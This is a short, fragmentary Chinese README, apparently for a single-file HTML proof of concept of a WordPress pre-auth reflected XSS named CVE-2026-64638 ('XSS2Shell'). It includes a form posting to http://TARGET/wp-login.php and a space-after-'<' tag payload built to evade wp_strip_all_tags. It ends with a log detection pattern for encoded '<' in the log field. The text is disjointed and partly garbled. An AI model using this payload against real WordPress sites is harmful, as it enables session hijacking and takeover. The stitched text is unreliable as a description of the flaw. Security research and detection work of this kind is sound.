
CVE-2026-64638 (XSS2shell) POC.
WordPress 预认证反射型 XSS 概念验证
针对 WordPress 核心中 CVE-2026-64638(XSS2Shell)解析器差异型 XSS 的单文件 HTML 概念验证。演示通过精心构造的登录请求在 WordPress 源中执行未认证的 JavaScript。
strip_tags() 与 wp_kses_post())POC.html。action 中的 http://TARGET/wp-login.php 替换为你的目标地址。<form id="poc" method="post" action="http://TARGET/wp-login.php">
confirm()(或 alert())弹窗。< area id=ajaxurl href=/?rest_route=/&_method=GET&_jsonp=confirm&_envelope=1>
< div id=color-picker class=reset-pass-submit>
< button class="wp-generate-pw color-option">X
每个 < 后面的空格正是漏洞利用所在。如果没有该空格,wp_strip_all_tags() 会删除所有内容。
log 字段中的 %3C + 空白字符模式。log 包含编码后 < 的 POST /wp-login.php 请求。